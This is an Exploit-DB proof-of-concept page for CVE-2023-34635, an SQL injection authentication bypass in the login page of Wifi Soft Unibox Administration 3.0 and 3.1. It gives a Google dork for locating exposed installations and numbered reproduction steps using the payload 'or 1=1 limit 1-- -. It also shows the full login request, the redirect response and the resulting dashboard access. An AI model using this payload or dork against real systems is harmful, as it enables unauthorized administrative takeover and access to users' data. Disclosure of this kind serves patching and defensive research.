Wifi Soft Unibox Administration 3.0 & 3.1 - SQL Injection

🗓️ 20 Jul 2023 00:00:00Reported by Ansh JainType

exploitdb🔗 www.exploit-db.com👁 295 Views

Wifi Soft Unibox Administration 3.0 & 3.1 Login Page - SQL Injection allows unauthorized admin acces

Reporter	Title	Published	Views	Family All 13
0day.today	Wifi Soft Unibox Administration 3.0 & 3.1 - SQL Injection Vulnerability	21 Jul 202300:00	–	zdt
ATTACKERKB	CVE-2023-34635	31 Jul 202314:15	–	attackerkb
Circl	CVE-2023-34635	31 Jul 202318:37	–	circl
CNNVD	Wifi Soft Unibox Administration SQL注入漏洞	20 Jul 202300:00	–	cnnvd
CVE	CVE-2023-34635	31 Jul 202300:00	–	cve
Cvelist	CVE-2023-34635	31 Jul 202300:00	–	cvelist
EUVD	EUVD-2023-38679	3 Oct 202520:07	–	euvd
NVD	CVE-2023-34635	31 Jul 202314:15	–	nvd
Packet Storm	Wifi Soft Unibox Administration 3.0 / 3.1 SQL Injection	21 Jul 202300:00	–	packetstorm
Prion	Sql injection	31 Jul 202314:15	–	prion

# Exploit Title: Wifi Soft Unibox Administration 3.0 & 3.1 Login Page - Sql Injection
# Google Dork: intext:"Unibox Administration 3.1", intext:"Unibox 3.0"
# Date: 07/2023
# Exploit Author: Ansh Jain @sudoark
# Author  Contact : [email protected]
# Vendor Homepage: https://www.wifi-soft.com/
# Software Link:
https://www.wifi-soft.com/products/unibox-hotspot-controller.php
# Version: Unibox Administration 3.0 & 3.1
# Tested on: Microsoft Windows 11
# CVE : CVE-2023-34635
# CVE URL : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34635

The Wifi Soft Unibox Administration 3.0 and 3.1 Login Page is vulnerable to
SQL Injection, which can lead to unauthorised admin access for attackers.
The vulnerability occurs because of not validating or sanitising the user
input in the username field of the login page and directly sending the
input to the backend server and database.

## How to Reproduce
Step 1 : Visit the login page and check the version, whether it is 3.0,
3.1, or not.
Step 2 : Add this payload " 'or 1=1 limit 1-- - " to the username field and
enter any random password.
Step 3 : Fill in the captcha and hit login. After hitting login, you have
been successfully logged in as an administrator and can see anyone's user
data, modify data, revoke access, etc.


--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
### Login Request
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

-----------------------------------------------------------------------------------------------------------------------
Parameters: username, password, captcha, action
-----------------------------------------------------------------------------------------------------------------------

POST /index.php HTTP/2
Host: 255.255.255.255.host.com
Cookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858d
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101
Firefox/102.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 83
Origin: https://255.255.255.255.host.com
Referer: https://255.255.255.255.host.com/index.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

username='or+1=1+limit+1--+-&password=randompassword&captcha=69199&action=Login

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
### Login Response
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

HTTP/2 302 Found
Server: nginx
Date: Tue, 18 Jul 2023 13:32:14 GMT
Content-Type: text/html; charset=UTF-8
Location: ./dashboard/dashboard
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
### Successful Loggedin Request
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

GET /dashboard/dashboard HTTP/2
Host: 255.255.255.255.host.com
Cookie: PHPSESSID=rfds9jjjbu7jorb9kgjsko858d
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101
Firefox/102.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://255.255.255.255.host.com/index.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
### Successful Loggedin Response
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

HTTP/2 200 OK
Server: nginx
Date: Tue, 18 Jul 2023 13:32:43 GMT
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache_control: private


<!DOCTYPE html>
<html lang="en">
html content
</html>

20 Jul 2023 00:00Current

9.7High risk

Vulners AI Score9.7

CVSS 3.19.8

EPSS0.0019

SSVC

Wifi Soft Unibox Administration 3.0 &amp; 3.1 - SQL Injection

Wifi Soft Unibox Administration 3.0 & 3.1 - SQL Injection